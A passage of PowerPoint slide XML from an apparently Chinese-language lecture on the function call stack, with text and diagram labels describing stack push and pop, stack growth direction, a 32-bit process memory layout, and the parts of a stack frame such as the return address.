            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）的状态被保存在栈内，被调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）的状态被压入调用栈的栈顶</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>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在函数调用结束时，栈顶的函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）状态被弹出，栈顶恢复到调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）的状态</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>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函数调用栈在内存中从高地址向低地址生长，所以栈顶对应的内存地址在压栈时变小，退栈时变大</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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3D031153-67BB-46A4-9E6D-D0CCB11A217E}"/>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791552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hape 619">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{882F2EF2-FA22-4B45-91DD-8939C13C313B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="31" idx="3"/>
            <a:endCxn id="28" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5262265" y="2350512"/>
            <a:ext cx="2751" cy="1294899"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8409706"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="980000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Shape 622">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08A6371B-83C1-4E1A-AD6A-3AB5F953C370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6096000" y="1723675"/>
            <a:ext cx="5041894" cy="4168152"/>
            <a:chOff x="5524975" y="1183600"/>
            <a:chExt cx="3036475" cy="3551150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Shape 623">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D70729A3-CB7B-4815-B509-C1B7F22E6356}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5524975" y="1596175"/>
              <a:ext cx="238200" cy="274200"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 8333"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="1905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5" name="Shape 624">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9474056B-F607-4267-9B7F-409725167A47}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5792750" y="1183600"/>
              <a:ext cx="2768700" cy="3551150"/>
              <a:chOff x="4897550" y="1085100"/>
              <a:chExt cx="2768700" cy="3551150"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 625">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EC097F4-B8DB-4720-8DCB-699B3683A01D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1212775"/>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rPr>
                  <a:t>For Kernel</a:t>
                </a:r>
                <a:endParaRPr dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Shape 626">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C33F9C2F-0E82-4BBF-A976-B252A4F4E6B9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1486975"/>
                <a:ext cx="1363200" cy="281099"/>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Stack</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Shape 627">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C4DDA1C-BAAD-4874-9E6F-FA12D12C5537}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1761175"/>
                <a:ext cx="1363200" cy="603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Shape 628">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D5E3B76-3F1B-4175-84D3-A144101D1C90}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2365075"/>
                <a:ext cx="1363200" cy="44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shared libraries</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Shape 629">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB1D11A9-52EF-40AF-9A40-276A113D8331}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2807875"/>
                <a:ext cx="1363200" cy="603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 name="Shape 630">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AD4C1CF-9580-4F46-B4E8-C250B4D1C3FF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3411775"/>
                <a:ext cx="1363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Heap</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Shape 631">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56FD7174-0F20-4CD4-A488-EFB8DC03B573}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3685975"/>
                <a:ext cx="1363200" cy="274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Data</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Shape 632">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4897EBFA-5D09-43A5-AF46-ED08A85DF867}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3960175"/>
                <a:ext cx="1363200" cy="2742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Text</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="Shape 633">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E035F1E-FFA2-4EB8-89D7-B3485CD7DDA3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="4234375"/>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Unused</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="15" name="Shape 634">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5A19862-8302-4D12-8091-29AEF34B9841}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:stCxn id="8" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5579150" y="1761175"/>
                <a:ext cx="0" cy="367800"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="16" name="Shape 635">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17BC2F7D-F2F1-415B-B3E6-8BB3C5F20833}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:stCxn id="11" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="5579150" y="3077575"/>
                <a:ext cx="0" cy="334200"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Shape 636">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{362352FB-4C36-4C1D-AC9D-0769DD936331}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6619250" y="1085100"/>
                <a:ext cx="1047000" cy="274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latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:rPr>
                  <a:t>0xFFFFFFFF</a:t>
                </a:r>
                <a:endParaRPr sz="1000">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18" name="Shape 637">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46E79958-92A6-475E-99D7-46BBFEB17F57}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6619250" y="1359300"/>
                <a:ext cx="1047000" cy="274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dirty="0">
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:rPr>
                  <a:t>0xC0000000</a:t>
                </a:r>
                <a:endParaRPr sz="1000" dirty="0">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="19" name="Shape 638">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEC41C93-783F-495C-8AA9-C85F673B7FA1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6619250" y="2674225"/>
                <a:ext cx="1047000" cy="274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latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:rPr>
                  <a:t>0x40000000</a:t>
                </a:r>
                <a:endParaRPr sz="1000">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="Shape 639">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{148B6067-575D-4250-9964-8189ACD8C21C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6619250" y="4058550"/>
                <a:ext cx="1047000" cy="274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latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:rPr>
                  <a:t>0x08048000</a:t>
                </a:r>
                <a:endParaRPr sz="1000">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="21" name="Shape 640">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C259D00C-3D94-449D-839B-5C6A8EA0329F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="6260750" y="1218750"/>
                <a:ext cx="358500" cy="6900"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="22" name="Shape 641">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7856FE6-9830-4289-A290-D96D0D367EF8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="6260750" y="1492950"/>
                <a:ext cx="358500" cy="6900"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="23" name="Shape 642">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A08A36B3-6B3F-4DF3-A6BA-36578B224A03}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="6260750" y="2807875"/>
                <a:ext cx="358500" cy="6900"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="24" name="Shape 643">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B42A998-DF6E-40B1-8094-91650E959A65}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="6260750" y="4221500"/>
                <a:ext cx="358500" cy="6900"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="25" name="Shape 644">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9E54597-204A-4893-8767-41B285255A4E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="6260750" y="4495700"/>
                <a:ext cx="358500" cy="6900"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26" name="Shape 645">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A5A299C-3DFC-425A-87A3-2C988083A45C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6619250" y="4362050"/>
                <a:ext cx="1047000" cy="274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latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:rPr>
                  <a:t>0x00000000</a:t>
                </a:r>
                <a:endParaRPr sz="1000">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Shape 646">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52C8EFC1-AADF-4D52-A09B-1EAE6F2088A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="723948" y="2192158"/>
            <a:ext cx="5372052" cy="3210393"/>
            <a:chOff x="713400" y="1474025"/>
            <a:chExt cx="4283825" cy="2779500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Shape 621">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D61A8D17-35FC-4508-B15B-810E4460C5F2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="1474025"/>
              <a:ext cx="2537400" cy="274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previous stack frame pointer</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Shape 647">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22F69E3D-54E1-46B0-912F-3528263EC322}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="1748225"/>
              <a:ext cx="2537400" cy="5727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arguments</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Shape 648">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8C155EB-71F4-4F63-9BC3-879B2F186BD8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="2320925"/>
              <a:ext cx="2537400" cy="274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return address</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Shape 620">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B4C9F3D-FBDA-4376-97B2-D7EFD3888AB8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1794981" y="2595125"/>
              <a:ext cx="2537400" cy="2742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stack frame pointer</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Shape 649">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
